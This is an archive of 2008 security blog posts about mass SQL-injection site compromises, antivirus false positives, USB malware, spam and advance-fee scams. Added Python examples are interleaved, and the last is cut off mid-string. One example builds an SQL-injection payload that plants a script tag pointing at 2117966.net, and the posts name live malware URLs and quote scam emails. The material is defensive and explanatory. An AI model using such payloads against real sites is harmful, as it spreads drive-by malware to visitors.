  • classicdriver.com (Motoring)
winzipices.cn
  • imo.org (International Maritime Organisation)
  • cifas.org.uk (Fraud Prevention)
  • hmdb.org (Historical Marker Database)
  • abbyy.com (OCR software)
  • cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
  • www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
  • newmarket.travel (Travel)
  • discoverireland.ie (Travel)
  • gay.tv (Lifestyle)
Some of these sites are regularly infected with SQL injection attacks, and safecanada.ca was infected with the last major outbreak. The problem is that once a site has been attacked and enumerated, then it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.

Wednesday, 23 April 2008

nihaorr1.com - there's no such thing as a "safe" site

Websense gave a heads up about yet another mass defacement, impacting a few high profile web sites. Just to make life difficult, they didn't specify the domain in use.. but it isn't exactly rocket science to find out that it is nihaorr1.com.

I'm going to make an assumption that if you're reading this blog, you're at least somewhat technically savvy. Don't visit any of these sites unless you know what you are doing.

Googling nihaorr1.com/1.js brings up several thousand matches. Surprisingly, an examination of www.nihaorr1.com/1.js shows that it is not obfuscated at all and points to www.nihaorr1.com/1.htm.. and that has all the exploits nicely laid out - MS07-055, MS07-033, MS07-018, MS07-004 and MS06-014. Also there are exploits for RealPlayer, Ajax, QQ Instant Messenger and some sort of Yahoo! product (probably Instant Messenger).


If your site has been compromised and you're looking for answers.. well, all I can tell you is that it will have been done through some sort of SQL Injection similar to this one.

If you're supporting client PCs that are fully patched, you have a little less to worry about unless you have RealPlayer or Yahoo! IM installed. Perhaps it is a good time to consider banning these applications in any case, particularly RealPlayer which is a very common vector for attack.

Why do I say there's no such thing as a "safe" site? Well, among the compromised sites are the following:

www.redmondmag.com [Independent publication about Microsoft]
www.pocketpcmag.com [Smartphone & Pocket PC magazine]
www.careers.civil-service.gov.uk [UK Civil Service]
www.faststream.gov.uk [UK Civil Service]
www.safecanada.ca [Canadian National Security]
www.n-somerset.gov.uk [UK Local Government]
events.un.org [United Nations]
www.unicef.org.uk [UNICEF]
www.iphe.org.uk [Institute of Plumbing and Heating Engineering]
www.umc.org [United Methodist Church]
www.umita.org [United Methodist Information Technology Association]
www.simplyislam.co.uk [Islamic Information site]
www.rsa.org.uk [Royal Society for the Encouragement of Arts]
www.24.com [Sports]
www.oddbins.co.uk [Major UK wine retailer]
www.avx.com [Electronic components]
www.advantech.com [Computer components]
www.aeroflot.aero [Airline]
www.aeroflot.ru [Airline]

In other words, you can't rely on the site you are visiting to be safe.. so the onus is on the end user to make sure their PC is fully patched and as secure as possible.

Tuesday, 22 April 2008

Win32/Loodok!generic.2 in SYSTEM.DLL - likely false positive

We're getting a plague of these with eTrust (pattern 5723):

[time 22/04/2008 12:54:21: ID 14: machine xxxxx.com: response 22/04/2008 12:54:46] The Win32/Loodok!generic.2 was detected in C:\DOCUME~1\XXXXX\LOCALS~1\TEMP...\SYSTEM.DLL. Machine: XXXXX, User: XXXXX\xxxxx. Status: File was cured; system cure performed.

The subdirectory varies, but it is usually %user profiles%\local settings\temp\ns???.tmp where the question marks indicate a random letter/number. You may find that the subdirectory has vanished by the time you investigate.
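When a false positive fires on every workstation that runs a particular installer, the useful thing is to separate that flood from anything else the scanner reports. This added example (not from the post) parses eTrust alert lines of the shape quoted above and marks the ones matching this pattern: signature Win32/Loodok!generic.2, SYSTEM.DLL under an ns???.tmp directory in the user's temp folder, and one of the pattern versions the post reports as affected. The sample alerts are constructed; the machine names, user and temp directory name are made up, and the second alert is a deliberately different path that must not be waved through.

```python
"""Separate a known eTrust false positive from other alerts (added example)."""
import re

# Shape of the alert line quoted in the post.
ALERT = re.compile(
    r"^\[time (?P<time>.+?): ID (?P<id>\d+): machine (?P<machine>.+?): "
    r"response (?P<response>.+?)\] The (?P<signature>\S+) was detected in "
    r"(?P<path>.+?)\. Machine: (?P<host>[^,]+), User: (?P<user>.+?)\. "
    r"Status: (?P<status>.+)$"
)

# %user profile%\Local Settings\Temp\ns???.tmp\SYSTEM.DLL, in either the long
# or the 8.3 (LOCALS~1\TEMP) spelling of the path.
FP_PATH = re.compile(
    r"\\(?:Local Settings|LOCALS~1)\\Temp\\ns[0-9a-z]{3}\.tmp\\system\.dll$", re.I
)
FP_SIGNATURE = "Win32/Loodok!generic.2"
FP_PATTERNS = {5723, 5724}  # eTrust pattern versions the post reports as affected


def parse_alert(line):
    """Dict of the alert's fields, or None if the line is not an alert."""
    m = ALERT.match(line.strip())
    return m.groupdict() if m else None


def is_known_false_positive(alert, pattern_version):
    """True only when signature, path shape and pattern version all match."""
    return (alert is not None
            and alert["signature"] == FP_SIGNATURE
            and FP_PATH.search(alert["path"]) is not None
            and pattern_version in FP_PATTERNS)


def triage_alerts(lines, pattern_version):
    """Split alert lines into (likely false positives, everything else)."""
    false_positives, keep = [], []
    for line in lines:
        alert = parse_alert(line)
        if is_known_false_positive(alert, pattern_version):
            false_positives.append(line)
        else:
            keep.append(line)
    return false_positives, keep


# Constructed sample alerts (timestamps and ID copied from the post's line;
# hosts, user and the ns???.tmp directory name are made up).
SAMPLE_ALERTS = [
    "[time 22/04/2008 12:54:21: ID 14: machine ws01.example.com: "
    "response 22/04/2008 12:54:46] The Win32/Loodok!generic.2 was detected in "
    "C:\\DOCUME~1\\JSMITH\\LOCALS~1\\TEMP\\nsk1F.tmp\\SYSTEM.DLL. "
    "Machine: WS01, User: EXAMPLE\\jsmith. Status: File was cured; system cure performed.",
    # Same signature, but a path outside the installer temp directory: keep it.
    "[time 22/04/2008 13:02:05: ID 15: machine ws02.example.com: "
    "response 22/04/2008 13:02:10] The Win32/Loodok!generic.2 was detected in "
    "C:\\WINDOWS\\SYSTEM32\\SYSTEM.DLL. "
    "Machine: WS02, User: EXAMPLE\\asmith. Status: File was cured; system cure performed.",
]

if __name__ == "__main__":
    fps, keep = triage_alerts(SAMPLE_ALERTS, 5723)
    print(f"likely false positives: {len(fps)}, to investigate: {len(keep)}")
    for line in keep:
        print("investigate:", parse_alert(line)["path"])
```

The path check is deliberately narrow: the same signature on a DLL anywhere else stays in the "investigate" pile, and once the pattern version moves past the affected ones nothing is filtered at all.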

This appears to be happening with the installer for Firefox (also tested with Netscape Navigator). You can see the problem if you snooze the AV scanner and then fire up the Firefox installer and leave it running.. the SYSTEM.DLL is clearly there.

Apart from eTrust, VirusTotal gives it a clean bill of health.

You may be seeing this fire off by itself if a software package is autoupdating. I can't identify exactly which installer is in use here, but it is likely to be shared between many other applications.. so expect a storm of these.

As usual with false positives, expect a fix to be issued by CA very soon. The problem seems to be with pattern 5723, so updating to a later virus signature should probably cure it.

Added: Pattern 5724 also reports a positive, but the beta version of 5725 does not. You can download beta signatures from CA here.

Added: 5725 is now available for download as normal, this should cure the problem!

Thursday, 17 April 2008

RavMon.exe virus on new Toshiba Satellite laptop from Comet, Part II

A few weeks ago I wrote about a new laptop with a virus preloaded that was bought from Comet. As far as I knew, I was the only person to have this problem but after carefully checking everything that I had done to set up the machine, my conclusion was that the RAVMON.EXE malware was preloaded on the PC.. but perhaps it was a one-off.

Not so. From the comments on the post, it seems that Toshiba laptops from Currys and PC World have the problem too, and over at the Irreverence Is Justified blog it turns out that exactly the same thing has happened: same virus, same model of Toshiba, and Comet (again).

Detections varied between scanners, but it appears to be a trojan that spreads via USB keys. The implication is that some part of the manufacturing process / preparation is compromised with infected USB devices.

So Toshiba's manufacturing process is compromised? Well, it appears to be.. but almost definitely an accident rather than a malicious act. Presumably there are many more L40-18Z laptops with the same problem..
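The post does not say how RAVMON.EXE gets from a USB key onto the machine; autorun.inf is the usual mechanism for USB-borne malware of this era, so it is the check worth making on any key that has been near the production line. The script below is an added example (not from the original post, and not Toshiba's or Comet's code): it reads a drive's autorun.inf, pulls out every entry that would run a program on insertion, and reports whether the named file is actually present. The autorun.inf content is constructed for illustration; only the file name RavMon.exe comes from the post.

```python
"""Flag autorun.inf entries that launch a program from a removable drive."""
import re
import shlex
from pathlib import Path

# Keys in [autorun] that run or offer to run a program (Windows XP-era semantics):
# open=, shellexecute=, and shell\<verb>\command=
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)


def parse_autorun(text):
    """Key/value pairs of the [autorun] section, keys lower-cased."""
    entries, in_autorun = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries.append((key.strip().lower(), value.strip()))
    return entries


def launch_targets(text):
    """Programs the autorun.inf would run or put on the AutoPlay menu, in order."""
    targets = []
    for key, value in parse_autorun(text):
        if not LAUNCH_KEY.match(key):
            continue
        tokens = shlex.split(value, posix=False)   # posix=False keeps Windows backslashes
        if not tokens:
            continue
        exe = tokens[0].strip('"')
        if exe not in targets:
            targets.append(exe)
    return targets


def check_drive(root):
    """Read <root>\\autorun.inf (any capitalisation) and report each launch target
    and whether the file it names exists on the drive."""
    root = Path(root)
    if not root.is_dir():
        return []
    inf = next((p for p in root.iterdir() if p.is_file() and p.name.lower() == "autorun.inf"), None)
    if inf is None:
        return []
    report = []
    for exe in launch_targets(inf.read_text(errors="replace")):
        present = (root / exe.replace("\\", "/")).exists()
        report.append({"target": exe, "present": present})
    return report


# Constructed sample, not the real file from the infected laptops.
SAMPLE = """[autorun]
icon=disk.ico
label=My USB stick
open=RavMon.exe
shell\\open\\Command=RavMon.exe
shellexecute="RavMon.exe" -s
"""


def self_check():
    """Builds a scratch 'drive' carrying SAMPLE plus a placeholder RavMon.exe."""
    import tempfile
    root = Path(tempfile.mkdtemp())
    (root / "AUTORUN.INF").write_text(SAMPLE)
    (root / "RavMon.exe").write_bytes(b"MZ placeholder, not the real file")
    return check_drive(root)


if __name__ == "__main__":
    import sys
    for finding in check_drive(sys.argv[1] if len(sys.argv) > 1 else "E:\\"):
        print(finding)
```

A key that only carries icon= and label= is harmless; anything with open=, shellexecute= or a shell\...\command= entry pointing at an executable on the stick deserves a look, whether or not the AV on the box recognises the file.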

Wednesday, 16 April 2008

2117966.net revisited

Last month I blogged about Trend Micro's website being compromised as well as thousands of others with an IFRAME injection to 2117966.net .

The ISC has followed up with an analysis of the tool used to compromise the sites. It uses an SQL injection attack to infect the server, but the interesting thing is that it uses Google to enumerate the vulnerable sites first, a technique called Google Hacking.

I guess there are a few things to note here - despite the ubiquity of SQL, it can still be tricky to set up securely and is best left to people who know what they are doing. Keep your patches up-to-date, and consider carefully if you want Google (or any other search engine) to be able to index your WHOLE site and adjust your robots.txt if necessary.

The ISC article also links to some good resources if you want to properly secure your database.
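To make the SQL injection point concrete, here is an added example that is not from the ISC write-up or the original post. It shows the pattern that made these sites injectable (a request parameter concatenated straight into a SQL string and handed to a driver that runs the whole batch) next to the parameterised version that is immune. The victims' stack (classic ASP building strings for SQL Server, where a batch of ';'-separated statements runs in one call) is an assumption; sqlite3 stands in for it here, the table is a toy, and the payload is modelled on the campaign's effect (stamping a script tag onto stored text) rather than copied from the tool.

```python
"""Concatenated vs parameterised SQL, with a 2117966.net-style payload."""
import sqlite3

INJECTED_TAG = "<script src=http://www.2117966.net/fuckjp.js></script>"

# Constructed payload: close the quoted literal, append a statement that appends
# the script tag to every row, then comment out whatever followed in the query.
PAYLOAD = "';UPDATE pages SET body=body||'" + INJECTED_TAG + "';--"


def setup():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, slug TEXT, body TEXT);
        INSERT INTO pages(slug, body) VALUES ('tspy_lineage', 'Steals online game credentials.');
        INSERT INTO pages(slug, body) VALUES ('adw_sample',   'Displays unwanted adverts.');
    """)
    return conn


def run_batch(conn, sql):
    """Stand-in for a driver that executes a whole batch in one call (the ADO /
    SQL Server behaviour assumed above). Returns the rows of the first statement;
    anything after the first ';' is executed too, which is what the attacker relies on."""
    first, _, rest = sql.partition(";")
    rows = conn.execute(first).fetchall()
    if rest.strip():
        conn.executescript(rest)
    return rows


def page_body_vulnerable(conn, slug):
    """The 2008 pattern: request parameter concatenated straight into the SQL."""
    sql = "SELECT body FROM pages WHERE slug='" + slug + "'"
    return [row[0] for row in run_batch(conn, sql)]


def page_body_safe(conn, slug):
    """Parameterised query: the value travels separately from the SQL text, so
    quotes and semicolons inside it are data, never statements."""
    rows = conn.execute("SELECT body FROM pages WHERE slug=?", (slug,)).fetchall()
    return [row[0] for row in rows]


def injected_rows(conn):
    """Rows that now carry a script tag, i.e. pages that would serve it to visitors."""
    return conn.execute("SELECT COUNT(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]


if __name__ == "__main__":
    db = setup()
    page_body_safe(db, PAYLOAD)
    print("after parameterised lookup:", injected_rows(db), "rows injected")
    page_body_vulnerable(db, PAYLOAD)
    print("after concatenated lookup: ", injected_rows(db), "rows injected")
    print(page_body_safe(db, "tspy_lineage"))
```

Note that the injected page still looks fine to the site owner: the rows are intact apart from a tag appended to the end, which is why so many of the sites in the list above stayed infected for weeks. The real tool reportedly walked the database catalogue to hit every text column rather than one table, but the fix is the same: never build the statement from user input.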

Thursday, 10 April 2008

ezBay.me.uk - or how NOT to start an online business

Sometimes, people make mistakes with their online marketing. Newbies can accidentally buy a "millions of email addresses CD" with a load of scraped email addresses and spam away. Sometimes they are not aware of trademark laws. But sometimes they are just plain stupid in so many ways that there is no excuse for not ripping into them.

Mistake One - Trademark Violation
In this case, the budding entrepreneur has gone for the name ezBay.me.uk - confusingly similar to a well-known auction company called eBay. Sure, there are other users of the "ezbay" name, but the closeness of the name and even the "camel case" capitalisation are asking for trouble, possibly some years down the line.. but trouble nonetheless.

Mistake Two - Choose a stupid domain name.
Not only does "ezbay.me.uk" possibly violate trademarks, but it uses the ".me.uk" namespace which is designed for personal use only. That could well lead to the name being revoked by the registrar. Worse, the name doesn't make sense in British English - "Ee Zed Bay"? In American English it's "Easy Bay" which *does* make sense.. but not in conjunction with a .me.uk domain name.

Mistake Three - Spam
There's no excuse for sending out unsolicited bulk email to scraped email addresses, but ezBay.me.uk have done exactly that. That tends to lead to a very short life expectancy for the new auction site that you have just created.

EZBAY
24/7 online Auction Site

This is our new 24/7 online auction please feel free to take a look if you like what you find please register and we will give you £20.00 sellers fee completely free there is no listing fee for items that you may want to sell so what are you waiting for sign up today for your £20.00 and start selling at www.ezbay.me.uk feel free to take a look around at all the bargains
we have many less than 50% cheaper than the high street price so come on see
how easy it is with ezbay happy shopping

BRAND NEW AUCTION

Car DVD player starting bid 50p buy now price £139.00

MP4 player with 1.3m pixels digital camera 2.5in TFT screen starting bid 50p buy now price £32.90

12mp digital video camera with MP3/MP4 starting bid 50p buy now price £76.00

1.1 inch screen clip MP3 player starting bid 50p buy now price £8.50

12.1-inch with 4:3 display roof mount TFT-LCD monitor Starting bid 50p buy now price £62.50

MP3 player sunglasses with FM super-plastic frame and build-in 1 GB flash
memory starting bid 50p buy now price

best regards

mr a m dick
ezbay world

Mistake Four - Be offensive
Signing off an email with a name of "Mr A M Dick" is always likely to annoy people (unless that is the person's name in which case.. oh dear).

Mistake Five - Read Receipts
Not only is this spam, but it is also sent out with a read receipt in a clumsy way to confirm the recipient's email address. Not only will the muppet sending out the spam be overwhelmed with receipts, but many people regard them as invasive of privacy.

The forensics..
The headers indicate that the mail comes from 75.125.202.82 which is also the IP address of www.ezbay.me.uk, so that's pretty much a smoking gun.

The domain name is registered to:

     Domain name:
ezbay.me.uk

Registrant:
Ezbay

Registrant type:
UK Individual

Registrant's address:
8 Calle Las Encines
Fuenta De Piedra
Malaga
295 30
ES

Last time I checked, Malaga wasn't in the UK. This address is connected with an Alibaba operation called Murrays Discount.

There's no evidence that this is a scam, but it is almost a textbook example of how to kill a business before it starts. It is notable that despite the spam run, the only person actually selling is "Murray" himself.

Tuesday, 8 April 2008

419 Scams and Social Engineering

One key element that scammers use when carrying out their business is social engineering. Usually, the approach is to make the victim believe that they are getting something for nothing.. it's even better when they can persuade the victim that the VICTIM is actually scamming someone else.

Take this recent example:

Subject: COMPENSATION,
From: eze_john1@aol.in
Date: Tue, April 8, 2008 9:15 am

My Dear Friend,
This is to thank you for your effort. I understood that your hands were tied. But not
to worry.

I have succeeded, the money has been transferred into the account provided by a newly
found friend of mine in Australia. To compensate for your past assistance and
commitments, I have dropped an International Certified Bank Draft cheque worth
$1,200,000.00 for you.

I am in London with my family presently. I do intend to establish some business
concerns here, and possibly buy some properties. Contact my Secretary in
Benin Republic, job_mike20@yahoo.fr, on his email below (job_mike20@yahoo.fr). Forward
my mail to him, then ask him to send the cheque to you. Take good care of yourself.

Best Regards,
EZE JOHN

Even though the English is very poor, the concept here is a bit more sophisticated than your average 419 scam. The email has been designed to look as though it has been misdelivered in some way - so the victim thinks that this should have been sent to someone else. But there's a dangling carrot of $1.2m here, and some people will see an opportunity to try to bilk "Eze John" out of the money.

Of course, there is no money.. but there will be a whole set of mysterious "fees" and expenses to try to get the money out, that at least is standard for a 419 scam. The twist here is that the VICTIM is also attempting to perpetrate a fraud, and this makes it very unlikely that the victim will ever go to the police to report it. It is also possible that the scammer might try to blackmail the victim to keep it quiet.

This approach offers a great deal of protection for the fraudsters. The original email is rather vague and might not be obvious to law enforcement. And if anyone takes the hook, then the victim too appears guilty.

This attempt is a bit of a lame one, but a truly successful con artist can use these techniques with a great deal more polish. So although you would never follow up on a misdirected email like this, it is easy to see how people can fall for it.

Monday, 7 April 2008

"uslegaljobs.net" Money Mule Scam

Money mule scams are usually associated with Eastern European criminals, but this one is slightly different originating from an IP address of 41.219.194.90 in Nigeria.

HILTON FINANCE HOME Inc.
Industrial & Personal Financier's
Our Ref: FMF-117-212.
MEMO: 2008-2nd Quarter-Online Search Recruitment Exercise.

HILTON FINANCE HOME Inc in-support of Magnum Building Company Int (Interior
Furniture Experts) will be opening this offer to Interested Individuals/Corporate
bodies in the United States, Canada, Australia and the Entire Europe to enable them
make an extra 10.05% commission based earning right from the convenience of their
home or office apartment and without affecting their primary occupation.

WHAT WE DO:-
We issue and help to secure loans on behalf of customers who make purchases from our
partner company Magnum Building Company Int which we also process and monitor to
make sure that our loans are used for the sole reason of financing our customer
purchases with our parent company.

ABOUT THIS JOB:-
Since most of our customers make payments in large Instrumental fractions after
securing a finance loan for them, our mother company became faced with the task of
receiving loan payments from Magnum Building Company Int customers through our
conventional method of payments remittance due to delays in processing time. Hence,
we decided to advertise and search for Individuals of GOOD STANDING who will assist
the company receive these finance payments directly from our finance houses/banks as
on behalf of our customers and then forward on to the company on a weekly/monthly
basis. Some little amounts however will come from our customers directly

YOUR EARNING:-
You will be accredited as our legal Payment representative in the United States,
Canada, Australia and the Entire Europe and will be in charge of all payments from
within your region, for this you will be paid a 10.05% of all payments you receive,
and forward on a weekly/monthly basis.

To get more Information about this Business arrangement, you should reply to our
e-mail providing the Information listed below and we will either respond by regular
mail or Fax providing you with our business prospectus.

First Name:
Last Name:
Contact Address:
Phone:
Fax Numbers:
Best Time to Call:

Please send your correspondence and Information to.
Recruit Department.
David Benson.
E-mail: register@uslegaljobs.net
IMPORTANT NOTICE:- Please be advised that this is a 100% legal business endeavor and
that it is only a contract based employment program and that it will not in any way
affect your primary employment.

Copyright 2008-2009 Hilton Finance Home Inc © All right reserved

This is soliciting replies to a domain of uslegaljobs.net, registered in January 2008 - this appears to be registered to a real address and possibly with genuine contact details. Usually in these cases, the contact details are false, so I've attached this as an image rather than something indexable.

The domain is hosted by Microsoft, and although there's no web site there is an MX record:
uslegaljobs.net mail is handled by 25 pamx1.hotmail.com

So, on a first inspection the domain looks legitimate.. it might even be that it is legitimately registered but has been hijacked. Nonetheless, this is a classic money mule scam where the victim thinks they are getting 10.05% commission for next to no work.. the Nigerian IP address is a clincher too. And you've got to love the phrase please be advised that this is a 100% legal business endeavor which is always another sure sign of a scam.

Tuesday, 1 April 2008

Telephore - advertising gone too far?

Context-sensitive ads are all the rage, but Telephore is the first one to bring them to your mobile phone.. nope, not text messages, but spoken ads that interrupt your call!

What is even more troubling is that Telephore analyses your conversations with a sophisticated voice recognition system and stores them for later reference. Is this too much power to give to a private company? Mobile Gazette have more details on this controversial system.

Monday, 31 March 2008

BBC Argh

The BBC News website is a much-loved design institution. A very neat, conservative design it has remained pretty much unchanged since its inception. It would be fair to say that it is one of the most recognisable layouts in the business, along with Google and Amazon.

So, you mess with something like this at your peril.. and hats off to the BBC for trying to update the site without being too radical. It's a wider, less cluttered design (according to their blog entry).

Unfortunately, it no longer works on 800 pixel wide screens.. now although that resolution has almost died out on desktop PCs, there are a number of existing and upcoming mobile devices that use it (e.g. Nokia E90, Sony Ericsson Xperia), and one of the great things about the BBC News site was that it would work well on almost anything.

To be honest, I can't remember anyone complaining about the 800 pixel wide "old" layout. And a lot of people will be uncomfortable with the change to a favourite web site, as the comments say.

If you have a bit of time on your hands, why not take a look at how the BBC News site has evolved over the past few years at the Wayback Machine.

Friday, 28 March 2008

A 419 spam with a twist

419 scams often involve pandering to human greed. In this case, the email is clearly designed to make you think that you have lucked into $800,000 through mistaken identity. Of course, the internal logic doesn't bear close scrutiny.

What's interesting about this email is that it has a calendar invitation on the bottom - clicking on it confirms your email address and presumably is designed to give the message an authentic twist.

Of course, there isn't $800,000 sitting around for you and you can guarantee that "Eze Ike" will try and bilk you out of some money along the way.

You are invited ::
Dear Friend,
By your host:
Eze Ike

Message:
Dear Friend,

I did not forget your past effort and attempts to assist me, now I'm
happy to inform you that I have succeeded in getting those funds
transferred under the cooperation of a new partner from Japan.

Now Contact my secretary ask him for ($800.000.00) for your compensation
his name is Mr Mike Bello, and his E-mail: (ifeany_eze01@yahoo.co.uk)
1. Your Full Name___ 2. Delivery address___ 3. phone number____ 4. email
address___
Thanks and God Bless You.
REGARDS
Dr Eze Ike.

Date:
Friday, 28 March 2008
Time:
10:00 - 11:00 (GMT+00:00)

Will you attend?

Reply to this invitation

Thursday, 27 March 2008

Lazy 419 spam

Is it me, or is the quality of scam spam going down these days? This fake lottery notification doesn't even try to look convincing.

Subject: Easter Notification(You have won 953,000:00gbp)
From: "UK THUNDERBALL LOTTERY" delroyclarke@nf.sympatico.ca
Date: Thu, March 27, 2008 11:50 am


You won 953,000:00Pounds in the Uk thunderball online Lottery held on
25th of
March 2008.
Contact Person.
MRS GAIL NEUVILLE
E-MAIL: ukthunderball_claimlottery4@yahoo.co.uk
contact her with your details:
1.Name.
2.Address.
3.Nationality.
4.Age.
5.Occupation.
6.Phone/Fax.
Regards
Mrs.Gail Neuville

I think I will give it a miss, thanks.

Incidentally, you can report spam like this to Yahoo through their online reporting tool. The user ID you are reporting on is everything before the @ sign on the Yahoo email address. It is worth stating that even though the spam doesn't come from the Yahoo network, it does use a drop email address at Yahoo to process replies.

Tuesday, 25 March 2008

Is 97885 really Vodafone?

The UK's premium rate SMS (text messaging) business is worth over £1 billion per year. It's not surprising then that scammers are in on the act, looking for a slice of that revenue.

These premium rate services use "SMS shortcodes" - but the same kind of shortcode can also be used for standard rate (or free) services. So how can you tell which is which?

Take this one for example - a text message sent to Vodafone customers that says the following:

From 97885
From Vodafone: Service Enquiry. We are always looking to improve our service. Please help us by answering 2 questions. Reply Yes to start, all replies are free.

On the surface, it all looks pretty legitimate. But wait.. isn't this the kind of approach that scammers use? There have been several cases where spammers can work out your mobile phone network, and who can tell if 97885 is a premium rate number or not?

Well, one organisation that should know is the stupidly named PhonepayPlus body (formerly ICSTIS) that is meant to regulate these premium rate services. They have a service called SMSus which can look up a premium rate SMS shortcode by text (why they can't do this on the web is a mystery).

So, does sending the 97885 number for SMSus help? No.

From 76787
From SMSus: No info held about this number. Have a concern? Call 0800 500 212 open 8-6, Mon-Fri. Calls free from landline, mobile network charges apply.
So, pretty useless. Eventually though, a response to an online support call to Vodafone indicates that 97885 is Vodafone, and it is free.

But surely the problem here is that the system is so fundamentally broken that no-one can tell a real message from a scam? Perhaps it is time that whoever is actually responsible for regulating this mess comes up with an easy way to identify the true owners of SMS shortcodes and can say how much they may cost.

Apple Safari - a driveby download or what?

Millions of people are currently wondering what a "Safari" icon is doing on their Windows desktop. Is it something they installed? Is it adware? Or has Apple turned to the dark side?

Well, I'm afraid that Apple have turned to the dark side. If it wasn't annoying enough that iTunes keeps appearing on your desktop if you just want QuickTime, Apple's latest ploy is to push their Safari web browser out as an "update" to your existing software.. even if you have never installed Safari before.

A legitimate upgrade? Or deceptive advertising? Read more about the drive-by install here, and then decide if Apple software has any place on your Windows desktop machine.

Thursday, 20 March 2008

"Gold is Risky - Green is a solid investment" - eFoodSafety.com (EFSF.OB) Spam

The Boulder Pledge is an important principle when it comes to fighting spam - basically, it is a commitment to never buy a product advertised in spam. Some people take it one step further, and say that they will never do any kind of business at all with a company that spams.

It's particularly pathetic when a firm resorts to spam to try to drum up investors. And yet, in the case of eFoodSafety.com (EFSF.OB) - a stock that has lost two thirds of its value in the past 12 months - that appears to be exactly what it happening.

A mystery spam entitled "Gold is Risky - Green is a solid investment" has been circulating over the past couple of days, both by email and also on several blogs. The link in the message points to a sign-up page at http://pws.prserv.net/RevNew/EFSF_LLP01.html with the following blurb:

To the Growth-Oriented Investor...

This could be one of the best buys you make during these recessionary times. And you can be certain this recession will wreak havoc on the unprepared.
Yes!
You can achieve profits in today's market!

The coming months will be a nightmare for investors seeking significant profits, except for those who successfully position themselves in key sectors like biotech.
Be among the first to learn about this new trend opportunity.
Download our Company Fact Sheet NOW!

The growth of these sector markets will be so dramatic that it can be confidently forecasted that this is an investing "mega-trend" worth billions in new market capitalization for companies with the right products at the right time.

Download the Company Fact Sheet of one of these innovative biotech companies NOW!

The email itself is just a picture of an attractive and presumably partially naked woman, the subject and sender are:

Subject: Gold is Risky - Green is a solid investment
From: "Investing Ideas" Ignite@InvestingIdeas.prserv.net
Date: Thu, March 20, 2008 2:58 am

Some detective work is required to find out where it comes from. The address on the image is 7702 E Doubletree Ranch Road, Suite 300 Scottsdale, AZ 85258. Some research shows that this is connected with eFoodSafety.com, and indeed the three products pictured are eFoodSafety products: Cinnergen, Immune Boost Bar, Talsyn Scar Cream (shown here).

So, given the address matches eFoodSafety.com, and the only three products shown in the spam and on the landing page are eFoodSafety.com's products, then it is beyond a reasonable doubt that this is an attempt to attract investors to the EFSF.OB stock.

There's no indication to say that eFoodSafety.com is anything other than a legitimate company, and it is not even clear if they send this spam out themselves or contracted a third party to do it (technical note: the spam originates from 69.60.98.141). It does not appear to be a pump-and-dump spam. We do not know if Redwood Consultants, LLC (who are listed as their IR firm) knows about this either.

So - back to the Boulder Pledge. If you feel that you've received this message and that it was unsolicited, then you certainly shouldn't invest in EFSF.OB. As we have said before, a mismanaged email campaign can seriously damage the reputation of a firm. Perhaps eFoodSafety.com would like to find the people responsible and terminate their relationship with them before more harm comes their way.

Thursday, 13 March 2008

Very authentic looking Hallmark ecard trojan

A very authentic-looking (but fake) Hallmark e-card carrying a trojan was sent out overnight, purporting to be from Hallmark.com:

A Friend has sent you a Hallmark E-Card.

If you recognize this name, click the link to see your E-Card.
http://www.hallmark.com/ECardWeb/ECV.jsp?a=[snip]


If this name is not familiar to you and you're concerned about online security, please use the following steps:

1. Visit http://www.hallmark.com/getecard
2. Enter your e-mail address in the Original Recipient's E-Mail Address box.
3. Enter EG0694262772475 in the Confirmation Number box.
4. Click Display Greeting.

Want to send an E-Card too ? Visit www.hallmark.com/ecards

To view Hallmark’s privacy policy or for questions, visit www.hallmark.com, and click the links at the bottom of the page.

The displayed links are all safe, however the FIRST link actually points to hxxp:||pop.ayudaenaccion.org.sv|card.exe
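The give-away is the mismatch between what the link shows and where it goes, and that is something you can check mechanically on any HTML mail before anyone clicks. The script below is an added example, not from the original post: it collects every anchor's href and visible text, flags links whose visible text is a URL on a different host from the real target, and flags targets that are programs. The HTML is constructed to mirror the mail above; the hallmark.com addresses and the card.exe destination are the ones the post quotes.

```python
"""Audit an HTML e-mail for display/target link mismatches and executable targets."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)
EXECUTABLE = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


class LinkCollector(HTMLParser):
    """Gathers (href, visible text) for every <a> in the document."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased host, tolerating bare 'www.example.com/path' text."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def audit_links(html):
    """Links worth a second look, each with the reasons it was flagged."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        reasons = []
        # Visible text that is itself a URL must point at the host it names.
        if LOOKS_LIKE_URL.match(text) and host_of(text) != host_of(href):
            reasons.append(f"shows {host_of(text)} but goes to {host_of(href)}")
        path = urlsplit(href).path.lower()
        if path.endswith(EXECUTABLE):
            reasons.append(f"target is a program ({path.rsplit('.', 1)[-1]})")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed to mirror the Hallmark mail; only the addresses come from the post.
SAMPLE_MAIL = """<html><body>
<p>A Friend has sent you a Hallmark E-Card.</p>
<p>If you recognize this name, click the link to see your E-Card.<br>
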